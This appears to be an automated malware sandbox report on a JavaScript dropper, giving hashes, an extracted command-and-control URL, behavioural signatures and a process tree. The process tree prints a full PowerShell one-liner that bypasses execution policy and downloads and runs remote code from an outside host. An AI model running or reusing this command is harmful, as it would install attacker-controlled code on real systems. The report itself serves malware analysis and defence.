Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
08-02-2024 14:30
Static task
static1
Behavioral task
behavioral1
Sample
ARS4254253425425.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ARS4254253425425.js
Resource
win10v2004-20231215-en
General
-
Target
ARS4254253425425.js
-
Size
30KB
-
MD5
b3f0d4ff6b231ceb9bcf39d6d773f995
-
SHA1
1f2b2b1eb4ce6bf53d1c42bfe08c5e642b1acfbb
-
SHA256
93d8e735e2028a6bb2191ae91273d9a6999058b74f78ac1523c93a575b795c25
-
SHA512
08e7332453dbf2a62e19edbc1ea5be251356547f02ea5afe60780d9d5ae330e18cab3c49e5ab43aa5ce7277aac672f73788db0ee84053484b9cbfb83aed7cca7
-
SSDEEP
768:ic78kofr9MzttQJklxbYPP9/r3e2wFoehDrMZmvkBKRdZXOLkr8R2Jx/gwwNEBce:iK4mRYPPtr3jh+x5Y6CJhU/0m
Malware Config
Extracted
https://assime.ca/command.php
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2660 powershell.exe 6 2660 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2660 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2660 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid process target process PID 928 wrote to memory of 2660 928 wscript.exe powershell.exe PID 928 wrote to memory of 2660 928 wscript.exe powershell.exe PID 928 wrote to memory of 2660 928 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ARS4254253425425.js1⤵
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660